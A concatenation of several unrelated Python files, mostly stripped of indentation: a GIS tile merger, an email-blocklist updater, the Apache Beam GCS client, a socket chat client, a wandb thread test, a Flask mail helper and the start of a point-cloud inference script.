if self.force or not os.path.exists(output_fn):
pad_x=self.pad/self.dx
pad_y=self.pad/self.dy
pad_bounds=np.array([left-pad_x,right+pad_x, bottom-pad_y, top+pad_y])
blend = self.f.to_grid(dx=self.dx,dy=self.dy,bounds=pad_bounds)
if self.fill_iterations + self.smoothing_iterations > 0:
print("Filling and smoothing")
blend.fill_by_convolution(self.fill_iterations,self.smoothing_iterations)
print("Saving")
if self.post_render:
blend=self.post_render(blend,output_fn=output_fn,bounds=bounds,pad_bounds=pad_bounds)
if self.pad>0:
blend=blend.crop(bounds)
blend.write_gdal( output_fn )
print("Done")
else:
print("Already exists. Skipping")
def merge(self):
# and then merge them with something like:
# if the file exists, its extents will not be updated.
output_fn=os.path.join(self.output_dir,'merged.tif')
os.path.exists(output_fn) and os.unlink(output_fn)
log.info("Merging using gdal_merge.py")
# Try importing gdal_merge directly, which will more reliably
# find the right library since if we got this far, python already
# found gdal okay. Unfortunately it's not super straightforward
# to get the right way of importing this, since it's intended as
# a script and not a module.
try:
from Scripts import gdal_merge
except ImportError:
log.info("Failed to import gdal_merge, will try subprocess")
gdal_merge=None
cmd=["python","gdal_merge.py","-init","nan","-a_nodata","nan",
"-o",output_fn]+self.tile_fns
log.info(" ".join(cmd))
if gdal_merge:
gdal_merge.main(argv=cmd[1:])
else:
# more likely that gdal_merge.py is on PATH, than the script itself will
# be seen by python, so drop python, and invoke script directly.
subprocess.call(" ".join(cmd[1:]),shell=True)
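# Usage sketch (hedged): render a field to 1 km tiles at 2 m resolution and
# merge them; the field 'mrf', output directory and bounds are hypothetical.
#
#   tm = TileMaker(mrf, dx=2.0, dy=2.0, tx=1000, ty=1000, output_dir='tiles')
#   tm.tile(xmin=500000, ymin=4150000, xmax=504000, ymax=4154000)
#   tm.merge()                      # requires gdal_merge.py to be available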
if __name__ == '__main__':
topobathy = "/home/rusty/classes/research/spatialdata/us/ca/suntans/bathymetry/ca-topobathy/85957956/85957956/hdr.adf"
corrected_fn = "/home/rusty/classes/research/spatialdata/us/ca/suntans/bathymetry/usgs/southbay-corrected.xyz"
corrected = XYZText(corrected_fn,projection="EPSG:26910")
corrected2 = corrected.rectify()
tile = GdalGrid(topobathy)
zoom_ll = corrected.bounds_in_cs(tile.projection())
tile_cropped = tile.crop(zoom_ll)
tile_utm = tile_cropped.reproject(to_projection=corrected.projection())
# arithmetic interface may change...
# diff = tile_utm - corrected2
corr_on_tile = tile_utm.regrid(corrected2)
corr_cv = CurvilinearGrid(tile_utm.X,corr_on_tile,projection=tile_utm.projection())
subplot(211)
corrected.plot(vmin=-10,vmax=2)
subplot(212)
tile_utm.plot(vmin=-10,vmax=2)
|
updater.py
|
from http.client import HTTPResponse
from logging import getLogger
from pathlib import Path
from tempfile import gettempdir, gettempprefix
from threading import Thread
from time import time
from typing import Callable, Optional
from urllib.error import HTTPError
from urllib.request import Request, urlopen
try:
from os import geteuid
except ImportError:
def geteuid():
'Windows does not have `os.geteuid()`.'
return '1'
LOGGER = getLogger(__name__)
TMP_PATH = Path(gettempdir()).joinpath(
f'{gettempprefix()}-py3-validate-email-{geteuid()}')
TMP_PATH.mkdir(exist_ok=True)
BLACKLIST_URL = (
'https://raw.githubusercontent.com/martenson/disposable-email-domains/'
'master/disposable_email_blocklist.conf')
LIB_PATH_DEFAULT = Path(__file__).resolve().parent.joinpath('data')
BLACKLIST_FILEPATH_INSTALLED = LIB_PATH_DEFAULT.joinpath('blacklist.txt')
BLACKLIST_FILEPATH_TMP = TMP_PATH.joinpath('blacklist.txt')
ETAG_FILEPATH_INSTALLED = LIB_PATH_DEFAULT.joinpath('blacklist.etag.txt')
ETAG_FILEPATH_TMP = TMP_PATH.joinpath('blacklist.etag.txt')
LOCK_PATH = TMP_PATH.joinpath('blacklistupdater.lock')
class BlacklistUpdater(object):
"""
Optionally auto-update the built-in `blacklist.txt`, while using
a temporary place to put the newly downloaded one to avoid read-only
filesystem errors. If the installed `blacklist.txt` is fresh enough
don't look for newer versions.
"""
_refresh_when_older_than: int = 5 * 24 * 60 * 60 # 5 days
def _read_etag(self) -> Optional[str]:
'Read the etag header from the stored etag file when it exists.'
for path in [ETAG_FILEPATH_TMP, ETAG_FILEPATH_INSTALLED]:
try:
return path.read_text().strip()
except FileNotFoundError:
pass
@property
def _is_old(self) -> bool:
'Return `True` if the locally stored file is old.'
true_when_older_than = time() - self._refresh_when_older_than
for path in [BLACKLIST_FILEPATH_TMP, BLACKLIST_FILEPATH_INSTALLED]:
try:
return path.stat().st_ctime < true_when_older_than
except FileNotFoundError:
pass
return True # no file found at all
def _get_headers(self, force_update: bool = False) -> dict:
'Compile a header with etag if available.'
headers = dict()
if force_update:
return headers
etag = self._read_etag()
if not etag:
return headers
headers['If-None-Match'] = etag
return headers
def _download(self, headers: dict, blacklist_path: Path, etag_path: Path):
'Download and store the blacklist file.'
LOGGER.debug(msg=f'Checking {BLACKLIST_URL}')
request = Request(url=BLACKLIST_URL, headers=headers)
response = urlopen(url=request) # type: HTTPResponse
# New data available
LOGGER.debug(msg=f'Writing response into {blacklist_path}')
blacklist_path.write_bytes(response.fp.read())
if 'ETag' in response.headers:
LOGGER.debug(msg=f'Storing ETag response into {etag_path}.')
etag_path.write_text(response.headers['ETag'])
def _install(self):
"""
Download and store the blacklist file and the matching etag file
into the library path. This is executed from setup.py upon
installation of the library. Don't call this in your
application.
"""
LIB_PATH_DEFAULT.mkdir(exist_ok=True)
self._download(
headers={}, blacklist_path=BLACKLIST_FILEPATH_INSTALLED,
etag_path=ETAG_FILEPATH_INSTALLED)
def _process(self, force: bool = False):
'Start optionally updating the blacklist.txt file, while locked.'
if not force and not self._is_old:
LOGGER.debug(msg='Not updating because file is fresh enough.')
return
try:
self._download(
headers=self._get_headers(force_update=force),
blacklist_path=BLACKLIST_FILEPATH_TMP,
etag_path=ETAG_FILEPATH_TMP)
except HTTPError as exc:
if exc.code == 304:
# Not modified, update date on the tmp file
LOGGER.debug(msg='Local file is fresh enough (same ETag).')
BLACKLIST_FILEPATH_TMP.touch()
return
raise
def process(
self, force: bool = False, callback: Optional[Callable] = None):
'Start optionally updating the blacklist.txt file.'
        # Lock to avoid concurrent updates when multiple processes start up at once.
        # Import filelock locally because this module is also used by setup.py.
from filelock import FileLock
with FileLock(lock_file=LOCK_PATH):
self._process(force=force)
# Always execute callback because multiple processes can have
# different versions of blacklists (one before, one after
# updating)
if callback:
callback()
def update_builtin_blacklist(
force: bool = False, background: bool = True,
        callback: Optional[Callable] = None) -> Optional[Thread]:
"""
    Update and reload the built-in blacklist. Return the `Thread` used
    to do the background update so it can be `join()`-ed, or `None` when
    running in the foreground.
"""
LOGGER.info(msg='Starting optional update of built-in blacklist.')
blacklist_updater = BlacklistUpdater()
kwargs = dict(force=force, callback=callback)
if not background:
blacklist_updater.process(**kwargs)
return
bl_thread = Thread(target=blacklist_updater.process, kwargs=kwargs)
bl_thread.start()
return bl_thread
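# A minimal usage sketch (not part of the library): run a blocking, foreground
# update with debug logging. Assumes network access to BLACKLIST_URL.
if __name__ == '__main__':
    from logging import DEBUG, basicConfig
    basicConfig(level=DEBUG)
    update_builtin_blacklist(force=False, background=False)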
|
gcsio.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Google Cloud Storage client.
This library evolved from the Google App Engine GCS client available at
https://github.com/GoogleCloudPlatform/appengine-gcs-client.
"""
# pytype: skip-file
from __future__ import absolute_import
import errno
import io
import logging
import multiprocessing
import re
import sys
import threading
import time
import traceback
from builtins import object
from apache_beam.internal.http_client import get_new_http
from apache_beam.io.filesystemio import Downloader
from apache_beam.io.filesystemio import DownloaderStream
from apache_beam.io.filesystemio import PipeStream
from apache_beam.io.filesystemio import Uploader
from apache_beam.io.filesystemio import UploaderStream
from apache_beam.utils import retry
__all__ = ['GcsIO']
_LOGGER = logging.getLogger(__name__)
# Issue a friendlier error message if the storage library is not available.
# TODO(silviuc): Remove this guard when storage is available everywhere.
try:
# pylint: disable=wrong-import-order, wrong-import-position
# pylint: disable=ungrouped-imports
import apitools.base.py.transfer as transfer
from apitools.base.py.batch import BatchApiRequest
from apitools.base.py.exceptions import HttpError
from apache_beam.internal.gcp import auth
from apache_beam.io.gcp.internal.clients import storage
except ImportError:
raise ImportError(
'Google Cloud Storage I/O not supported for this execution environment '
'(could not import storage API client).')
# This is the size of each partial-file read operation from GCS. This
# parameter was chosen to give good throughput while keeping memory usage at
# a reasonable level; the following table shows throughput reached when
# reading files of a given size with a chosen buffer size and informed the
# choice of the value, as of 11/2016:
#
# +---------------+------------+-------------+-------------+-------------+
# | | 50 MB file | 100 MB file | 200 MB file | 400 MB file |
# +---------------+------------+-------------+-------------+-------------+
# | 8 MB buffer | 17.12 MB/s | 22.67 MB/s | 23.81 MB/s | 26.05 MB/s |
# | 16 MB buffer | 24.21 MB/s | 42.70 MB/s | 42.89 MB/s | 46.92 MB/s |
# | 32 MB buffer | 28.53 MB/s | 48.08 MB/s | 54.30 MB/s | 54.65 MB/s |
# | 400 MB buffer | 34.72 MB/s | 71.13 MB/s | 79.13 MB/s | 85.39 MB/s |
# +---------------+------------+-------------+-------------+-------------+
DEFAULT_READ_BUFFER_SIZE = 16 * 1024 * 1024
# This is the number of seconds the library will wait for a partial-file read
# operation from GCS to complete before retrying.
DEFAULT_READ_SEGMENT_TIMEOUT_SECONDS = 60
# This is the size of chunks used when writing to GCS.
WRITE_CHUNK_SIZE = 8 * 1024 * 1024
# Maximum number of operations permitted in GcsIO.copy_batch() and
# GcsIO.delete_batch().
MAX_BATCH_OPERATION_SIZE = 100
# Batch endpoint URL for GCS.
# We have to specify an API specific endpoint here since Google APIs global
# batch endpoints will be deprecated on 03/25/2019.
# See https://developers.googleblog.com/2018/03/discontinuing-support-for-json-rpc-and.html. # pylint: disable=line-too-long
# Currently apitools library uses a global batch endpoint by default:
# https://github.com/google/apitools/blob/master/apitools/base/py/batch.py#L152
# TODO: remove this constant and its usage after apitools moves to using an API
# specific batch endpoint, or after the Beam gcsio module starts using a GCS
# client library that does not use global batch endpoints.
GCS_BATCH_ENDPOINT = 'https://www.googleapis.com/batch/storage/v1'
def parse_gcs_path(gcs_path, object_optional=False):
"""Return the bucket and object names of the given gs:// path."""
match = re.match('^gs://([^/]+)/(.*)$', gcs_path)
if match is None or (match.group(2) == '' and not object_optional):
raise ValueError('GCS path must be in the form gs://<bucket>/<object>.')
return match.group(1), match.group(2)
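# For reference, hypothetical inputs and the tuples they yield:
#   parse_gcs_path('gs://my-bucket/path/to/file.txt')        -> ('my-bucket', 'path/to/file.txt')
#   parse_gcs_path('gs://my-bucket/', object_optional=True)  -> ('my-bucket', '')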
class GcsIOError(IOError, retry.PermanentException):
"""GCS IO error that should not be retried."""
pass
class GcsIO(object):
"""Google Cloud Storage I/O client."""
def __init__(self, storage_client=None):
if storage_client is None:
storage_client = storage.StorageV1(
credentials=auth.get_service_credentials(),
get_credentials=False,
http=get_new_http(),
response_encoding=None if sys.version_info[0] < 3 else 'utf8')
self.client = storage_client
self._rewrite_cb = None
def _set_rewrite_response_callback(self, callback):
"""For testing purposes only. No backward compatibility guarantees.
Args:
callback: A function that receives ``storage.RewriteResponse``.
"""
self._rewrite_cb = callback
def open(
self,
filename,
mode='r',
read_buffer_size=DEFAULT_READ_BUFFER_SIZE,
mime_type='application/octet-stream'):
"""Open a GCS file path for reading or writing.
Args:
filename (str): GCS file path in the form ``gs://<bucket>/<object>``.
mode (str): ``'r'`` for reading or ``'w'`` for writing.
read_buffer_size (int): Buffer size to use during read operations.
mime_type (str): Mime type to set for write operations.
Returns:
GCS file object.
Raises:
ValueError: Invalid open file mode.
"""
if mode == 'r' or mode == 'rb':
downloader = GcsDownloader(
self.client, filename, buffer_size=read_buffer_size)
return io.BufferedReader(
DownloaderStream(
downloader, read_buffer_size=read_buffer_size, mode=mode),
buffer_size=read_buffer_size)
elif mode == 'w' or mode == 'wb':
uploader = GcsUploader(self.client, filename, mime_type)
return io.BufferedWriter(
UploaderStream(uploader, mode=mode), buffer_size=128 * 1024)
else:
raise ValueError('Invalid file open mode: %s.' % mode)
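  # A minimal usage sketch (bucket and object names are hypothetical):
  #   with GcsIO().open('gs://my-bucket/data.txt', mode='r') as f:
  #       contents = f.read()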
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def delete(self, path):
"""Deletes the object at the given GCS path.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
try:
self.client.objects.Delete(request)
except HttpError as http_error:
if http_error.status_code == 404:
# Return success when the file doesn't exist anymore for idempotency.
return
raise
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def delete_batch(self, paths):
"""Deletes the objects at the given GCS paths.
Args:
paths: List of GCS file path patterns in the form gs://<bucket>/<name>,
not to exceed MAX_BATCH_OPERATION_SIZE in length.
Returns: List of tuples of (path, exception) in the same order as the paths
argument, where exception is None if the operation succeeded or
the relevant exception if the operation failed.
"""
if not paths:
return []
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for path in paths:
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
batch_request.Add(self.client.objects, 'Delete', request)
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
result_statuses = []
for i, api_call in enumerate(api_calls):
path = paths[i]
exception = None
if api_call.is_error:
exception = api_call.exception
# Return success when the file doesn't exist anymore for idempotency.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = None
result_statuses.append((path, exception))
return result_statuses
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def copy(
self,
src,
dest,
dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite API call will return after these many bytes.
Used for testing.
Raises:
TimeoutError: on timeout.
"""
src_bucket, src_path = parse_gcs_path(src)
dest_bucket, dest_path = parse_gcs_path(dest)
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
response = self.client.objects.Rewrite(request)
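    # Large objects may need more than one Rewrite call; pass the returned
    # rewriteToken back on each iteration until the service reports done.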
while not response.done:
_LOGGER.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten,
response.objectSize,
src,
dest)
request.rewriteToken = response.rewriteToken
response = self.client.objects.Rewrite(request)
if self._rewrite_cb is not None:
self._rewrite_cb(response)
_LOGGER.debug('Rewrite done: %s to %s', src, dest)
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def copy_batch(
self,
src_dest_pairs,
dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src_dest_pairs: list of (src, dest) tuples of gs://<bucket>/<name> files
paths to copy from src to dest, not to exceed
MAX_BATCH_OPERATION_SIZE in length.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite call will return after these many bytes. Used
primarily for testing.
Returns: List of tuples of (src, dest, exception) in the same order as the
src_dest_pairs argument, where exception is None if the operation
succeeded or the relevant exception if the operation failed.
"""
if not src_dest_pairs:
return []
pair_to_request = {}
for pair in src_dest_pairs:
src_bucket, src_path = parse_gcs_path(pair[0])
dest_bucket, dest_path = parse_gcs_path(pair[1])
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
pair_to_request[pair] = request
pair_to_status = {}
while True:
pairs_in_batch = list(set(src_dest_pairs) - set(pair_to_status))
if not pairs_in_batch:
break
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for pair in pairs_in_batch:
batch_request.Add(self.client.objects, 'Rewrite', pair_to_request[pair])
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
for pair, api_call in zip(pairs_in_batch, api_calls):
src, dest = pair
response = api_call.response
if self._rewrite_cb is not None:
self._rewrite_cb(response)
if api_call.is_error:
exception = api_call.exception
# Translate 404 to the appropriate not found exception.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = (
GcsIOError(errno.ENOENT, 'Source file not found: %s' % src))
pair_to_status[pair] = exception
elif not response.done:
_LOGGER.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten,
response.objectSize,
src,
dest)
pair_to_request[pair].rewriteToken = response.rewriteToken
else:
_LOGGER.debug('Rewrite done: %s to %s', src, dest)
pair_to_status[pair] = None
return [(pair[0], pair[1], pair_to_status[pair]) for pair in src_dest_pairs]
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def copytree(self, src, dest):
"""Renames the given GCS "directory" recursively from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>/.
dest: GCS file path pattern in the form gs://<bucket>/<name>/.
"""
assert src.endswith('/')
assert dest.endswith('/')
for entry in self.list_prefix(src):
rel_path = entry[len(src):]
self.copy(entry, dest + rel_path)
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def rename(self, src, dest):
"""Renames the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
"""
self.copy(src, dest)
self.delete(src)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def exists(self, path):
"""Returns whether the given GCS object exists.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
try:
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
self.client.objects.Get(request) # metadata
return True
except HttpError as http_error:
if http_error.status_code == 404:
# HTTP 404 indicates that the file did not exist
return False
else:
# We re-raise all other exceptions
raise
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def checksum(self, path):
"""Looks up the checksum of a GCS object.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).crc32c
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def size(self, path):
"""Returns the size of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: size of the GCS object in bytes.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).size
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def kms_key(self, path):
"""Returns the KMS key of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: KMS key name of the GCS object as a string, or None if it doesn't
have one.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).kmsKeyName
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def last_updated(self, path):
"""Returns the last updated epoch time of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
    Returns: last updated time of the GCS object in seconds.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
datetime = self.client.objects.Get(request).updated
return (
time.mktime(datetime.timetuple()) - time.timezone +
datetime.microsecond / 1000000.0)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def list_prefix(self, path):
"""Lists files matching the prefix.
Args:
path: GCS file path pattern in the form gs://<bucket>/[name].
Returns:
Dictionary of file name -> size.
"""
bucket, prefix = parse_gcs_path(path, object_optional=True)
request = storage.StorageObjectsListRequest(bucket=bucket, prefix=prefix)
file_sizes = {}
counter = 0
start_time = time.time()
_LOGGER.info("Starting the size estimation of the input")
while True:
response = self.client.objects.List(request)
for item in response.items:
file_name = 'gs://%s/%s' % (item.bucket, item.name)
file_sizes[file_name] = item.size
counter += 1
if counter % 10000 == 0:
_LOGGER.info("Finished computing size of: %s files", len(file_sizes))
if response.nextPageToken:
request.pageToken = response.nextPageToken
else:
break
_LOGGER.info(
"Finished listing %s files in %s seconds.",
counter,
time.time() - start_time)
return file_sizes
class GcsDownloader(Downloader):
def __init__(self, client, path, buffer_size):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._buffer_size = buffer_size
# Get object state.
self._get_request = (
storage.StorageObjectsGetRequest(
bucket=self._bucket, object=self._name))
try:
metadata = self._get_object_metadata(self._get_request)
except HttpError as http_error:
if http_error.status_code == 404:
raise IOError(errno.ENOENT, 'Not found: %s' % self._path)
else:
_LOGGER.error(
'HTTP error while requesting file %s: %s', self._path, http_error)
raise
self._size = metadata.size
# Ensure read is from file of the correct generation.
self._get_request.generation = metadata.generation
# Initialize read buffer state.
self._download_stream = io.BytesIO()
self._downloader = transfer.Download(
self._download_stream,
auto_transfer=False,
chunksize=self._buffer_size,
num_retries=20)
self._client.objects.Get(self._get_request, download=self._downloader)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def _get_object_metadata(self, get_request):
return self._client.objects.Get(get_request)
@property
def size(self):
return self._size
def get_range(self, start, end):
self._download_stream.seek(0)
self._download_stream.truncate(0)
self._downloader.GetRange(start, end - 1)
return self._download_stream.getvalue()
class GcsUploader(Uploader):
def __init__(self, client, path, mime_type):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._mime_type = mime_type
# Set up communication with child thread.
parent_conn, child_conn = multiprocessing.Pipe()
self._child_conn = child_conn
self._conn = parent_conn
# Set up uploader.
self._insert_request = (
storage.StorageObjectsInsertRequest(
bucket=self._bucket, name=self._name))
self._upload = transfer.Upload(
PipeStream(self._child_conn),
self._mime_type,
chunksize=WRITE_CHUNK_SIZE)
self._upload.strategy = transfer.RESUMABLE_UPLOAD
# Start uploading thread.
self._upload_thread = threading.Thread(target=self._start_upload)
self._upload_thread.daemon = True
self._upload_thread.last_error = None
self._upload_thread.start()
# TODO(silviuc): Refactor so that retry logic can be applied.
# There is retry logic in the underlying transfer library but we should make
# it more explicit so we can control the retry parameters.
@retry.no_retries # Using no_retries marks this as an integration point.
def _start_upload(self):
# This starts the uploader thread. We are forced to run the uploader in
# another thread because the apitools uploader insists on taking a stream
# as input. Happily, this also means we get asynchronous I/O to GCS.
#
# The uploader by default transfers data in chunks of 1024 * 1024 bytes at
# a time, buffering writes until that size is reached.
try:
self._client.objects.Insert(self._insert_request, upload=self._upload)
except Exception as e: # pylint: disable=broad-except
_LOGGER.error(
'Error in _start_upload while inserting file %s: %s',
self._path,
traceback.format_exc())
self._upload_thread.last_error = e
finally:
self._child_conn.close()
def put(self, data):
try:
self._conn.send_bytes(data.tobytes())
except EOFError:
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
raise
def finish(self):
self._conn.close()
# TODO(udim): Add timeout=DEFAULT_HTTP_TIMEOUT_SECONDS * 2 and raise if
# isAlive is True.
self._upload_thread.join()
# Check for exception since the last put() call.
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
|
client.py
|
import socket
import sys
import time
import threading
x = socket.socket()
h_name = input("Enter the hostname of the server: ")
port = 1234
x.connect((h_name, port))
print("Connected to chat server")
print("You can now start sending messages")
def recv():
    while True:
        incoming_message = x.recv(1024)
        print("Server: ", incoming_message.decode())
def send():
    while True:
        message = input()
        x.send(message.encode())
threading.Thread(target=recv).start()
threading.Thread(target=send).start()
|
multi_threading_test.py
|
import threading
import wandb
# Checks if wandb has issues during set up in a multithreaded environment
def thread_test(n):
run = wandb.init(project="threadtest")
run.log({"thread": n})
def main():
try:
threads = []
for i in range(2):
threads.append(threading.Thread(target=thread_test, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
except Exception as e:
print(e)
print("Issue with calling wandb init in a multithreaded situation")
raise AssertionError(
"Issue with calling wandb init in a multithreaded situation"
)
if __name__ == "__main__":
main()
|
emails.py
|
import os
from threading import Thread
from flask_mail import Message
from app import app, mail
def send_async_mail(app, msg):
with app.app_context():
mail.send(msg)
def mail_send(subject, recipients, text_body):
msg = Message(
subject, sender=os.environ.get("MAIL_DEFAULT_SENDER"), recipients=recipients
)
msg.body = text_body
thr = Thread(target=send_async_mail, args=[app, msg])
thr.start()
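# A minimal usage sketch (recipient and body are hypothetical; assumes the
# MAIL_DEFAULT_SENDER environment variable and Flask-Mail are configured):
#   mail_send("Password reset", ["user@example.com"], "Use the link below ...")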
|
inference.py
|
import argparse
import copy
from datetime import datetime
from enum import Enum
import glob
import importlib
import json
import logging
import math
import numpy as np
import os
import pickle
from pointset import PointSet
import pprint
from queue import Queue
import subprocess
import sys
import tempfile
import tensorflow as tf
import threading
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(BASE_DIR) # model
sys.path.append(os.path.join(ROOT_DIR, 'models')) # no, really model
sys.path.append(ROOT_DIR) # provider
sys.path.append(os.path.join(ROOT_DIR, 'utils'))
import provider
import tf_util
import pc_util
class InputType(Enum):
TXT='TXT'
LAS='LAS'
class OutputType(Enum):
LABELS='LABELS'
LAS='LAS'
BOTH='BOTH'
def __str__(self):
return self.value
def parse_args(argv):
# Setup arguments & parse
parser = argparse.ArgumentParser(
description=__doc__, # printed with -h/--help
# Don't mess with format of description
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('--gpu', type=int, default=0, help='GPU to use [default: GPU 0]')
parser.add_argument('--model', default='pointnet2_sem_seg', help='Model name [default: pointnet2_sem_seg]')
parser.add_argument('--extra-dims', type=int, default=[], nargs='*', help='Extra dims')
parser.add_argument('--model_path', default='data/results/scannet/log/model.ckpt', help='model checkpoint file path [default: log/model.ckpt]')
parser.add_argument('--num_point', type=int, default=8192, help='Point Number [default: 8192]')
parser.add_argument('--batch_size', type=int, default=16, help='Batch Size during inference [default: 16]')
parser.add_argument('--n_angles', type=int, default=3, help='Number of angles to use to sample image with')
parser.add_argument('--input_path', required=True, help='Input point clouds path')
parser.add_argument('--input_type', type=InputType, choices=list(InputType), default=InputType.TXT)
parser.add_argument('--output_path', required=True, help='Output path')
parser.add_argument('--output_type', type=OutputType, choices=list(OutputType), default=OutputType.LABELS)
return parser.parse_args(argv[1:])
def start_log(opts):
if not os.path.exists(opts.output_path):
os.makedirs(opts.output_path)
rootLogger = logging.getLogger()
logFormatter = logging.Formatter("%(asctime)s %(threadName)s[%(levelname)-3.3s] %(message)s")
fileHandler = logging.FileHandler(os.path.join(opts.output_path,os.path.splitext(os.path.basename(__file__))[0]+'.log'),mode='w')
fileHandler.setFormatter(logFormatter)
fileHandler.setLevel(logging.DEBUG)
rootLogger.addHandler(fileHandler)
logFormatter = logging.Formatter("%(threadName)s[%(levelname)-3.3s] %(message)s")
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
consoleHandler.setLevel(logging.INFO)
rootLogger.addHandler(consoleHandler)
rootLogger.level=logging.DEBUG
logging.debug('Options:\n'+pprint.pformat(opts.__dict__))
# Set global variables
FLAGS = parse_args(sys.argv)
start_log(FLAGS)
EPOCH_CNT = 0
BATCH_SIZE = FLAGS.batch_size
NUM_POINT = FLAGS.num_point
GPU_INDEX = FLAGS.gpu
MODEL_PATH = FLAGS.model_path
MODEL = importlib.import_module(FLAGS.model) # import network module
MODEL_FILE = os.path.join(ROOT_DIR, 'models', FLAGS.model+'.py')
os.system('cp %s %s' % (MODEL_FILE, FLAGS.output_path)) # bkp of model def
os.system('cp '+__file__+' %s' % (FLAGS.output_path)) # bkp of train procedure
NUM_CLASSES = 6
COLUMNS = np.array([0,1,2]+FLAGS.extra_dims)
NUM_DIMENSIONS = len(COLUMNS)
with open(os.path.join(os.path.dirname(FLAGS.model_path),'dfc_train_metadata.pickle'),'rb') as f:
METADATA = pickle.load(f)
SCALE = np.sqrt(METADATA['variance'])
SCALE[0:3] = np.sqrt(np.mean(np.square(SCALE[0:3])))
LABEL_MAP = METADATA['decompress_label_map']
def inference():
# Generate list of files
